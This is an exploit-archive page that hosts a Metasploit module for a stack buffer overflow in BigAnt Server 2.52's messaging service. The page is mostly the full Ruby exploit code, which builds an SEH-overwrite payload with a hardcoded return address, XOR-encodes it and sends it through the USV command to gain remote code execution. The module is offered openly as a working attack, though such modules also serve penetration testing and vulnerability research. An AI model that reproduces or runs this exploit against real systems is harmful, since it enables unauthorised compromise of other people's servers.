exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BigAnt Server 2.52 USV Buffer Overflow

BigAnt Server 2.52 USV Buffer Overflow
Posted Jan 5, 2010
Authored by jduck, DouBle_Zer0, Lincoln | Site metasploit.com

This exploits a stack overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This Metasploit module was tested successfully against version 2.52. NOTE: The AntServer service does not restart, you only get one shot.

tags | exploit, overflow
SHA-256 | dd69ef386f696d716346934cec43c21dfd0dbc94932dacb7f54813b7d02a26ca

BigAnt Server 2.52 USV Buffer Overflow

Change Mirror Download
##
# $Id: bigant_server_usv.rb 8071 2010-01-05 11:49:12Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'BigAnt Server 2.52 USV Buffer Overflow',
'Description' => %q{
This exploits a stack overflow in the BigAnt Messaging Service,
part of the BigAnt Server product suite. This module was tested
successfully against version 2.52.

NOTE: The AntServer service does not restart, you only get one shot.
},
'Author' =>
[
'Lincoln',
'DouBle_Zer0',
'jduck'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8071 $',
'References' =>
[
[ 'OSVDB', '61386' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10765' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10973' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => (218+709+35),
'BadChars' => "\x2a\x20\x27\x0a\x0f",
# pre-xor with 0x2a:
#'BadChars' => "\x00\x0a\x0d\x20\x25",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BigAnt 2.52 Universal', { 'Ret' => 0x1b019fd6 } ], # Tested OK (jduck) p/p/r msjet40.dll xpsp3
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 29 2009'))

register_options([Opt::RPORT(6660)], self.class)
end

def exploit
connect

sploit = ""
sploit << payload.encoded
sploit << generate_seh_record(target.ret)
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + payload_space.to_s).encode_string
sploit << rand_text_alphanumeric(3)
sploit << [0xdeadbeef].pack('V') * 3

# the buffer gets xor'd with 0x2a !
0.upto(sploit.length-1) do |idx|
sploit[idx] = sploit[idx] ^ 0x2a
end

print_status("Trying target #{target.name}...")
sock.put("USV " + sploit + "\r\n\r\n")

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close